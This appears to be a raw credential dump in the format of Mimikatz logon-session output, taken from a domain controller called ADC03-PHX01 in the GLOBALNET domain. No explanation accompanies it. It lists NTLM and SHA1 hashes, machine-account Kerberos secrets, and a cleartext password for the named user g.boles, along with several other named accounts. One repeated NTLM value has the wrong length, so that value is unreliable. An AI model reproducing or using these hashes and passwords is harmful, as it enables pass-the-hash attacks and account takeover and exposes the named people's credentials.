	 * SHA1 : c6d6b0c66dc63f47d18d5ce8fa97f49afc4fdc0c
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 9c 22 81 90 6a ae db 59 9f 6c 02 2c e1 c3 aa 75 de 25 d2 83 2c 57 5d 62 ce 06 54 c9 61 5f 04 37 d6 9e 11 1c eb 6c 99 16 67 04 07 42 be 92 cb 25 ac 48 2c 80 47 10 ed 88 61 16 e9 50 8c 55 99 07 a8 e1 fe fd 95 f3 19 87 1c 9d 2a 56 c1 51 24 29 8f a7 8c 96 89 e9 00 94 62 03 a0 bb 93 55 d1 2d 9f 8a 4e fd c1 85 e1 ef 21 3a 9c b1 32 8b b6 d3 a5 83 a6 09 f9 f3 0d 7d e1 84 db ff 68 ad 19 79 dd 83 2f 5b 46 07 67 4d f8 dc 4a fc f3 a4 4d b5 35 dc fe 91 b9 1f a0 7d 45 e1 16 aa 84 e5 84 77 f9 73 0f a6 be 41 b6 01 1d 5e 3e 2c 1e 7c a2 a8 7f 5e 70 d1 a8 14 93 99 48 da fd 90 31 f7 e5 d0 50 16 11 53 37 48 61 a6 63 21 bd 34 fa fe 95 47 c5 74 19 b7 8e 97 a9 59 41 c1 72 81 86 ec e1 be b8 1b fd 19 5b 16 1d ba e3 b0 c8 a8 28 2e d1 84
	ssp :
	credman :

Authentication Id : 1 ; 1757518195 (00000001:68c19973)
Session : Interactive from 25
User Name : DWM-25
Domain : Window Manager
Logon Server : (null)
Logon Time : 11/11/2020 9:12:30 AM
SID : S-1-5-90-25
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 1 ; 1683096831 (00000001:645204ff)
Session : RemoteInteractive from 24
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 3:12:11 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1184016099 (00000001:4692a6e3)
Session : RemoteInteractive from 22
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/5/2020 7:30:15 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045964277 (00000000:f12883f5)
Session : RemoteInteractive from 17
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	 [00000003] Primary
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails2
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails2
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3729906416 (00000000:de51daf0)
Session : RemoteInteractive from 15
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/14/2020 4:06:50 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3465255331 (00000000:ce8b99a3)
Session : Interactive from 14
User Name : DWM-14
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/9/2020 1:34:11 PM
SID : S-1-5-90-14
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3411885520 (00000000:cb5d3dd0)
Session : RemoteInteractive from 1
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/8/2020 3:00:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 267352825 (00000000:0fef7af9)
Session : RemoteInteractive from 5
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/17/2020 4:09:01 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 2401291774 (00000001:8f20cdfe)
Session : RemoteInteractive from 27
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 10:27:35 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1757521866 (00000001:68c1a7ca)
Session : RemoteInteractive from 25
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/11/2020 9:12:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1650471032 (00000001:62603078)
Session : RemoteInteractive from 23
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 7:45:28 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 532898358 (00000001:1fc36236)
Session : RemoteInteractive from 20
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/29/2020 7:38:19 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 532898318 (00000001:1fc3620e)
Session : RemoteInteractive from 20
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/29/2020 7:38:19 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4045959632 (00000000:f12871d0)
Session : Interactive from 17
User Name : DWM-17
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/20/2020 5:00:44 PM
SID : S-1-5-90-17
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3751704402 (00000000:df9e7752)
Session : RemoteInteractive from 16
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/15/2020 1:35:54 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3660849858 (00000000:da3422c2)
Session : RemoteInteractive from 13
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/13/2020 8:51:02 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3288536418 (00000000:c4031562)
Session : Interactive from 12
User Name : DWM-12
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 10:44:36 AM
SID : S-1-5-90-12
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : d9889c017ef3db77c8c91f2698b6b4d4
	 * SHA1 : 216b3dd017f9bb65cabc6230feef0a5da70be079
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : f0 3c 4a 64 58 23 0c 42 0a f3 de f1 0a a8 33 c7 b6 e1 85 af 81 5a be 1e 79 9a d1 91 57 45 13 c8 bf 75 16 3a 59 3b ac 5b 41 78 fd 83 01 32 62 21 6e 2e c8 64 26 2e 63 49 87 d8 10 80 65 a5 ad 53 57 1f 10 40 12 0b 5d 88 e1 64 3a 19 1b 1f b8 68 77 16 b9 a0 8d 6e b3 63 df a2 2f 24 cf cc 7c 3f ac 0c ed 17 68 0a 05 ec 49 99 02 20 60 84 6b 27 57 29 c0 9f a7 d8 2f c6 91 98 c1 4a c5 9a cb 5e bf 39 9f 04 40 54 84 3a cc 4e 97 7e 7a 77 63 b5 42 0b d9 3e dd 46 46 b5 5c 3a 69 73 4c 24 90 b2 a9 b7 d3 06 fc 68 0d eb 5a b3 b2 98 dc 37 d4 dc e2 6d 79 63 7e 64 cb 42 cc f6 b1 f6 8f d6 00 a4 9d 5f 75 79 bd c1 1b 9c ee a8 77 e1 2e d4 83 88 48 16 4d 53 aa b2 00 8f 1c d8 9c d1 c5 f3 1d 03 5a 51 d5 8d b5 7f fa 28 39 39 4a 0b a8 b4
	ssp :
	credman :

Authentication Id : 0 ; 3288536394 (00000000:c403154a)
Session : Interactive from 12
User Name : DWM-12
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/6/2020 10:44:36 AM
SID : S-1-5-90-12
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 2087392566 (00000000:7c6b1536)
Session : RemoteInteractive from 11
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/16/2020 4:44:41 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1983891629 (00000000:763fc8ad)
Session : RemoteInteractive from 10
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/14/2020 1:20:20 PM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1638269509 (00000000:61a60245)
Session : RemoteInteractive from 9
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/8/2020 11:31:51 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1217385810 (00000000:488fd552)
Session : RemoteInteractive from 8
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/1/2020 10:06:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1217385774 (00000000:488fd52e)
Session : RemoteInteractive from 8
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 9/1/2020 10:06:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 267352861 (00000000:0fef7b1d)
Session : RemoteInteractive from 5
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/17/2020 4:09:01 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116126204 (00000000:06ebf1fc)
Session : RemoteInteractive from 3
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:53:22 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116126168 (00000000:06ebf1d8)
Session : RemoteInteractive from 3
User Name : ctrails2
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:53:22 PM
SID : S-1-5-21-498103351-3997332795-3100871051-12967
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1180840 (00000000:001204a8)
Session : RemoteInteractive from 2
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/12/2020 11:34:38 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ADC03-PHX01$
Domain : GLOBALNET
Logon Server : (null)
Logon Time : 8/12/2020 11:30:50 PM
SID : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : adc03-phx01$
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 3842484785 (00000001:e507aa31)
Session : Interactive from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 12/2/2020 12:01:27 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : globalnet.local
	 * Password : Splat_9550!
	ssp :
	credman :

Authentication Id : 1 ; 2344160773 (00000001:8bb90e05)
Session : RemoteInteractive from 26
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 8:50:33 AM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	 [00000003] Primary
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	 [00010000] CredentialKeys
	 * NTLM : 5dccf338588af5e878393924440dd31b47
	 * SHA1 : 9d5cb5951028c851f4449ab582699851223ea290
	tspkg :
	wdigest :
	 * Username : ctrails
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ctrails
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 1 ; 1650471073 (00000001:626030a1)
Session : RemoteInteractive from 23
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/10/2020 7:45:28 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1000286130 (00000001:3b9f27b2)
Session : RemoteInteractive from 21
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/3/2020 8:35:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1000286094 (00000001:3b9f278e)
Session : RemoteInteractive from 21
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/3/2020 8:35:31 AM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 462032229 (00000001:1b8a0d65)
Session : RemoteInteractive from 19
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/28/2020 1:54:05 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4281980067 (00000000:ff39d4a3)
Session : RemoteInteractive from 18
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/23/2020 10:17:14 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 4079058940 (00000000:f3217ffc)
Session : Service from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/21/2020 6:31:26 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 3660849891 (00000000:da3422e3)
Session : RemoteInteractive from 13
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/13/2020 8:51:02 AM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 3465255253 (00000000:ce8b9955)
Session : Interactive from 14
User Name : DWM-14
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/9/2020 1:34:11 PM
SID : S-1-5-90-14
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : ADC03-PHX01$
	 * Domain : globalnet.local
	 * Password : 1f 3b 55 c9 37 d0 65 91 a9 b0 99 dd 52 ad b9 71 68 a8 3a dd 2e 17 19 78 f3 9f ac ba 06 d5 c0 d7 b0 09 20 61 e3 b5 a0 05 a3 c4 a9 25 cf 81 70 59 d4 b1 de 69 b1 c8 59 93 58 47 47 d2 5d 1e de f7 99 78 0e 96 d2 da a7 53 51 b4 84 bd a6 fa e2 d4 0b 81 41 1d 5c c4 c1 6d d5 28 91 02 cd e2 ba 83 ef 66 0a f0 79 9b dd 61 e5 77 f0 c9 97 b2 b5 a9 f7 7b 54 12 2a 07 43 7a 02 0f 93 d3 75 63 f4 b3 92 9d 6c 0e 18 a1 36 93 3b 73 e0 e1 12 f2 f3 e7 43 42 7f a4 a2 d6 13 29 60 cf ed 31 b0 57 48 94 09 60 28 60 93 75 54 33 aa f4 a4 67 ee be 09 ae 60 fa db cd 1d 14 35 21 13 dd 78 f2 ee 8a ba d3 72 76 4b 65 92 8a a4 05 03 83 09 9f 5d 26 e1 a2 63 dc 96 7a 2a 54 d0 c6 25 38 93 32 33 7d 72 54 4d aa 41 f5 20 e7 6f 36 ff da c0 73 01 14 3f c5
	ssp :
	credman :

Authentication Id : 0 ; 3411885558 (00000000:cb5d3df6)
Session : RemoteInteractive from 1
User Name : jehad.jamalalldeen
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 10/8/2020 3:00:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-26749
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 504788382 (00000000:1e16759e)
Session : RemoteInteractive from 7
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/20/2020 11:56:26 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 116428327 (00000000:06f08e27)
Session : RemoteInteractive from 4
User Name : ctrails
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/14/2020 12:56:27 PM
SID : S-1-5-21-498103351-3997332795-3100871051-5297
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 1181016 (00000000:00120558)
Session : RemoteInteractive from 2
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 8/12/2020 11:34:38 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : ADC03-PHX01$
Domain : GLOBALNET
Logon Server : (null)
Logon Time : 8/12/2020 11:30:58 PM
SID : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : adc03-phx01$
	 * Domain : GLOBALNET.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 73224 (00000000:00011e08)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 8/12/2020 11:30:50 PM
SID :
	msv :
	 [00000003] Primary
	 * Username : ADC03-PHX01$
	 * Domain : GLOBALNET
	 * NTLM : 12c4f1c0a7300d1f015d64e308229900
	 * SHA1 : ab62897a09ba3b99a035fbdfd87a6042126723d1
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 3842484810 (00000001:e507aa4a)
Session : Interactive from 0
User Name : g.boles
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 12/2/2020 12:01:27 AM
SID : S-1-5-21-498103351-3997332795-3100871051-15102
	msv :
	 [00000003] Primary
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	 [00010000] CredentialKeys
	 * NTLM : 2a7f47acb7457f80dbb0818577a7a79b
	 * SHA1 : 74aa69783329a7be32cdb00060a90c5cfbd7e0d3
	tspkg :
	wdigest :
	 * Username : g.boles
	 * Domain : GLOBALNET
	 * Password : (null)
	kerberos :
	 * Username : g.boles
	 * Domain : globalnet.local
	 * Password : Splat_9550!
	ssp :
	credman :

Authentication Id : 1 ; 2401291807 (00000001:8f20ce1f)
Session : RemoteInteractive from 27
User Name : sjose
Domain : GLOBALNET
Logon Server : ADC03-PHX01
Logon Time : 11/17/2020 10:27:35 PM
SID : S-1-5-21-498103351-3997332795-3100871051-11974
	msv :
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 1 ; 1683096786 (00000001:645204d2)
Session : RemoteInteractive from 24
User Name : jehad.jamalalldeen
